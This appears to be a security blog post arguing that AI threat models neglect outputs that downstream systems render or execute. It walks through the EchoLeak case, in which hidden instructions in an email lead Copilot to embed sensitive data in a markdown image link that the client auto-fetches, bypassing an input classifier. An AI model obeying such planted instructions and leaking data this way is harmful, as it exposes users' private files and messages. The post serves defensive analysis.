Output As Payload: Your AI Threat Model Got Half The Boundary
The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."
The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.
EchoLeak is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions cause Copilot to embed sensitive context into a reference-style markdown link in its response, and the client interface auto-fetches the external image — exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack didn't need to break the model's refusal calibration. It needed to shape one specific token sequence in the output.
